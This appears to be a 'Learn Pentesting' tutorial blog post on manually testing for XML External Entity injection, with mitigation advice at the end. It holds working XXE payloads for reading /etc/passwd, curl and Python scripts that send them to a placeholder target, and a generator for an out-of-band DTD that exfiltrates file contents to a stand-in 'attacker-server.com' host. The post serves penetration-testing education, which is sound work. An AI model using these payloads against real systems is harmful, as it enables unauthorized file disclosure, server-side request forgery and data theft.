Learn Pentesting: Manual Testing for XML External Entity Injection

XML External Entity (XXE) Injection remains one of the classic vulnerabilities in web applications that process XML input. In this post, we’ll explore the fundamentals of XXE, discuss its potential impact, and provide a step-by-step guide to testing for this vulnerability manually during a penetration test. This guide is part of our “Learn Pentesting” series and is intended for both seasoned security professionals and aspiring penetration testers.

Introduction

XML is widely used for data interchange in web applications, and many systems rely on XML parsers that are vulnerable to XXE injection when misconfigured. XXE can allow an attacker to read local files, perform server-side request forgery (SSRF), or, depending on the parser and environment, mount further attacks such as denial of service. In this article, we dive deep into manual testing for XXE vulnerabilities, with practical methods and code examples you can use to assess and exploit them in a controlled testing environment.

Understanding XXE Injection

XXE injection occurs when an XML parser processes external entities defined within XML documents. By including a maliciously crafted DOCTYPE declaration, an attacker can instruct the parser to include external content. A classic example is reading sensitive files from the server, such as /etc/passwd on Unix systems.

How It Works

XML Parsing: When a document containing a DOCTYPE is parsed, a parser with DTD processing enabled reads the entity declarations it contains.
Entity Definition: The attacker defines an external entity that references a local or remote resource.
Entity Expansion: If the parser is misconfigured (that is, external entity resolution is left enabled), it fetches the referenced resource and substitutes its content wherever the entity is referenced.
Resulting Impact: This may lead to data disclosure, SSRF, or other types of exploits.
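
The expansion step can be observed safely with an internal entity, which needs no file or network access. The sketch below uses Python's standard xml.etree.ElementTree; the entity name greeting and the helper name expand are illustrative only. ElementTree expands internal entities but, according to the Python documentation, does not resolve external ones and raises ParseError instead, which is roughly the behaviour you hope to see from a hardened parser.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text lives inside the document itself.
INTERNAL = """<!DOCTYPE foo [
  <!ENTITY greeting "hello from the DTD">
]>
<foo>&greeting;</foo>"""

# External entity: the replacement text would have to be read from disk.
EXTERNAL = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


def expand(document):
    """Return the root element's text, or None if the parser refuses the document."""
    try:
        return ET.fromstring(document).text
    except ET.ParseError:
        return None
```

Calling expand(INTERNAL) shows the entity replaced by its declared text, while expand(EXTERNAL) returns None because this particular parser declines to resolve the file reference. A vulnerable parser would return the file's content at the same point.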

Identifying Potentially Vulnerable Endpoints

Before testing for XXE, it’s important to identify endpoints that process XML input. Look for:

SOAP Services: Web services often use XML for message formatting.
RESTful APIs with XML Payloads: Even where JSON is the norm, many legacy systems still accept XML.
File Uploads or Data Import Features: Some applications allow XML uploads for configuration or data import.

Review documentation, analyze network traffic, or intercept requests using a proxy tool like Burp Suite to identify potential XML processors.
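
When reviewing a large set of captured requests, a small filter can help shortlist the ones worth testing. The following is a rough sketch, not a complete classifier: the function name looks_like_xml and the list of media types are assumptions chosen for illustration, and you would feed it the Content-Type header and body exported from your proxy.

```python
# Media types that commonly indicate an XML body (illustrative, not exhaustive).
XML_CONTENT_TYPES = ("application/xml", "text/xml", "application/soap+xml")


def looks_like_xml(content_type, body):
    """Return True if a captured request appears to carry an XML body."""
    # Drop parameters such as "; charset=utf-8" before comparing.
    media_type = content_type.split(";")[0].strip().lower()
    if media_type in XML_CONTENT_TYPES or media_type.endswith("+xml"):
        return True
    # Fall back to sniffing the body for an XML declaration.
    return body.lstrip().startswith("<?xml")
```

The body check matters because some endpoints parse XML even when the declared content type is generic.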

Crafting an XXE Payload

A well-crafted payload is essential for testing. The basic idea is to define an external entity in the XML document that references a local file. Below is an example payload designed to read the /etc/passwd file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Key Points

DOCTYPE Declaration: Introduces the entity definition.
ENTITY Definition: xxe is defined to load the content of /etc/passwd.
Entity Reference: &xxe; instructs the XML parser to insert the file’s content.
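
Because the three parts above always appear together, it can be convenient to generate the payload from a single function. This is a minimal sketch; the name build_xxe_payload and its parameters are hypothetical, and the output mirrors the payload shown earlier.

```python
def build_xxe_payload(system_id, root="foo", entity="xxe"):
    """Build an XML document whose root element references an external entity.

    system_id is the URI the parser is asked to load, e.g. a file:// or http:// URI.
    """
    # The system identifier is wrapped in double quotes, so it must not contain one.
    if '"' in system_id:
        raise ValueError("system_id must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY {entity} SYSTEM "{system_id}">\n'
        "]>\n"
        f"<{root}>&{entity};</{root}>"
    )
```

For example, build_xxe_payload("file:///etc/passwd") reproduces the document above, and passing a different URI swaps the target without retyping the DOCTYPE.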

For blind testing or SSRF scenarios, you might want to define an entity that points to an external server you control. For example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker-server.com/evil">
]>
<foo>&xxe;</foo>

This can be useful when the response does not directly include the content but you suspect an outbound request is made.
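
To observe such an outbound request you need something listening on the server you control. The sketch below is one possible minimal listener built on Python's standard http.server module; the names CallbackHandler, SEEN_REQUESTS, and start_listener, and the default port 8000, are assumptions for illustration rather than part of any particular tool.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# (client_ip, path) tuples recorded for every inbound GET request.
SEEN_REQUESTS = []


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record who called and which path they asked for, then reply.
        SEEN_REQUESTS.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        # Silence the default stderr logging; SEEN_REQUESTS is the record.
        pass


def start_listener(host="0.0.0.0", port=8000):
    """Start the listener in a background thread and return the server object."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

After calling start_listener() and sending the payload, an entry in SEEN_REQUESTS with the path /evil coming from the target's address suggests the parser resolved the entity. Call server.shutdown() when the test is finished.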

Manual Testing Techniques

Using cURL

cURL is a convenient command-line tool for sending HTTP requests. Here’s how you can use it to test for an XXE vulnerability:

curl -X POST -H "Content-Type: application/xml" --data '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>' http://targetapp.com/api/endpoint

Steps:

Set the Content-Type header to application/xml.
Include the XXE payload in the request body.
Submit the request to the identified XML processing endpoint.
Analyze the Response: Look for signs of file content (e.g., typical Unix user information) in the response body.

Using Python Requests

For a more programmable approach, the Python requests library can be employed. This method allows you to script the test and easily automate multiple tests:

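import requests

# Target endpoint that accepts XML (placeholder URL).
url = "http://targetapp.com/api/endpoint"
headers = {"Content-Type": "application/xml"}

# The XML declaration must be the very first thing in the document, so the
# string starts right after the opening quotes with no leading newline.
payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
"""

# A timeout keeps the script from hanging if the server stalls.
response = requests.post(url, data=payload, headers=headers, timeout=10)
print(response.status_code)
print(response.text)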

Steps:

Define the target URL and headers.
Create the payload with the malicious DOCTYPE and entity reference.
Send the POST request using the requests library.
Print and analyze the response for evidence of the file content.

Both methods provide a straightforward way to check whether the XML parser resolves external entities and returns the result in the response.
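
To automate multiple tests, the same request can be repeated for a list of candidate files. The sketch below keeps the HTTP call separate by accepting any callable named send that takes a payload string and returns the response body; file_payload, probe_files, and send are hypothetical names, and the file list is up to you.

```python
def file_payload(path):
    """Build an XXE payload that asks the parser to read the given absolute path."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<foo>&xxe;</foo>"
    )


def probe_files(send, paths):
    """Send one payload per path and collect the response bodies by path."""
    results = {}
    for path in paths:
        results[path] = send(file_payload(path))
    return results
```

With the requests script above, send could be a small wrapper such as lambda p: requests.post(url, data=p, headers=headers, timeout=10).text. Keeping the transport injectable also makes it easy to dry-run the loop without touching the target.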

Analyzing Responses

After sending your payload, carefully examine the HTTP response:

Direct Output: The response may include the contents of /etc/passwd or another targeted file. Look for typical content such as system user entries.
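Error Messages: Some XML parsers return errors that mention the DOCTYPE, the entity name, or a failed file or network lookup. Such errors can reveal configuration details and suggest that the parser attempted to process the DTD, which may indicate an XXE vulnerability.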
Out-of-Band Interactions: If you use an external entity pointing to a server you control, monitor that server for inbound requests. Tools like Burp Collaborator can automate this process.

It’s important to compare the response against what the application returns for a benign request. A lack of direct output does not necessarily mean the application is secure: the application may not reflect the parsed value, the file may be empty or unreadable by the service account, or the entity may have been resolved without any visible effect.
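
The checks above can be roughly approximated in code when triaging many responses. This is a heuristic sketch only: the function name classify_response, the regular expression, and the list of error keywords are assumptions, and both false positives and false negatives are likely, so treat the result as a prompt for manual review.

```python
import re

# Seven colon-separated fields with numeric UID and GID, as in /etc/passwd.
PASSWD_LINE = re.compile(r"[^:\s]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\s]*")

# Words that often appear in XML parser error messages (illustrative list).
ERROR_HINTS = ("doctype", "entity", "dtd", "saxparseexception")


def classify_response(body):
    """Label a response body as 'file-content', 'parser-error', or 'inconclusive'."""
    if PASSWD_LINE.search(body):
        return "file-content"
    lowered = body.lower()
    if any(hint in lowered for hint in ERROR_HINTS):
        return "parser-error"
    return "inconclusive"
```

An 'inconclusive' label is not evidence of safety; it simply means the response needs a closer look or an out-of-band test.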

Advanced Techniques and Bypasses

When basic payloads do not work, consider advanced techniques:

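Bypassing Entity Restrictions: Some parsers or filters block general external entities but still process parameter entities. Note that the XML specification does not allow a parameter entity reference inside another declaration in the internal DTD subset, so a declaration such as <!ENTITY xxe "%file;"> is rejected by conforming parsers. Instead, use a parameter entity to pull in an external DTD from a server you control:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % ext SYSTEM "http://attacker-server.com/evil">
  %ext;
]>
<foo>test</foo>

An inbound request for that URL shows that parameter entities are being resolved, and the DTD you host there is free to declare further entities.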

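Blind XXE with OOB Data Exfiltration: When direct responses aren’t available, an entity that points to an external URL you control can confirm the vulnerability, and an externally hosted DTD can carry file contents out in the URL of a follow-up request.
Nested Entity Expansion: Defining one entity in terms of another might bypass simple security filters that only match a single known pattern.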

Experimenting with variations can help uncover cases where the parser implements partial restrictions.
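
For the blind out-of-band case, a commonly described approach is to host an external DTD that reads a file into one parameter entity and then builds a second entity whose URL contains that value. The helper below sketches how such a DTD could be generated; build_exfil_dtd, the entity names, and the x query parameter are illustrative assumptions, and the technique tends to work only for short, single-line files because the content ends up inside a URL.

```python
def build_exfil_dtd(file_uri, callback_url):
    """Return the text of an external DTD for out-of-band exfiltration.

    file_uri is the resource to read; callback_url is a URL on a server you control.
    """
    return (
        # Step 1: load the target file into the parameter entity %file;.
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        # Step 2: declare %exfil; dynamically so %file; is expanded inside its URL.
        # &#x25; is the character reference for "%", needed inside the nested declaration.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{callback_url}?x=%file;'>\">\n"
        # Step 3: run the nested declaration, then trigger the outbound request.
        "%eval;\n"
        "%exfil;\n"
    )
```

As an example, build_exfil_dtd("file:///etc/hostname", "http://attacker-server.com/evil") yields a DTD you could serve from your own host; the file path here is just a sample. The payload sent to the target then only needs to load that DTD through a parameter entity.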

Mitigation Recommendations

For developers and security professionals, it’s critical to secure XML parsers against XXE attacks:

Disable External Entities: Configure the XML parser to disable external entity resolution and, where the application has no need for DTDs, to reject DOCTYPE declarations altogether.
Use Secure Libraries: Where possible, use libraries known for secure XML processing.
Input Validation: Ensure robust input validation and sanitization for XML inputs.
Least Privilege: Run services processing XML with minimal privileges to reduce the impact of a potential breach.

Implementing these practices will significantly reduce the risk of XXE attacks.
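
As one illustration of the first recommendation, the sketch below refuses any document that carries a DOCTYPE before handing it to the real parser. It uses only Python's standard library; DoctypeForbidden and parse_untrusted are hypothetical names, and in practice a maintained hardening library such as defusedxml may be a better fit than hand-rolled checks.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming document carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees a DOCTYPE, before any entity is used.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(data):
    """Parse XML bytes, refusing any document that declares a DOCTYPE."""
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # the handler's exception propagates out of Parse
    return ET.fromstring(data)
```

Rejecting the DOCTYPE outright is stricter than disabling external entities alone, so it only suits applications that never need DTDs. The document is parsed twice here for clarity, which a production implementation would likely avoid.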

Conclusion

Manually testing for XML External Entity Injection requires a detailed understanding of XML parsing and careful crafting of payloads. In this post, we’ve covered the key concepts behind XXE, demonstrated manual testing methods using both cURL and Python, and discussed advanced techniques for bypassing filters. Armed with these techniques, penetration testers can more effectively assess and remediate XXE vulnerabilities in their environments.

Keep exploring, keep testing, and stay secure.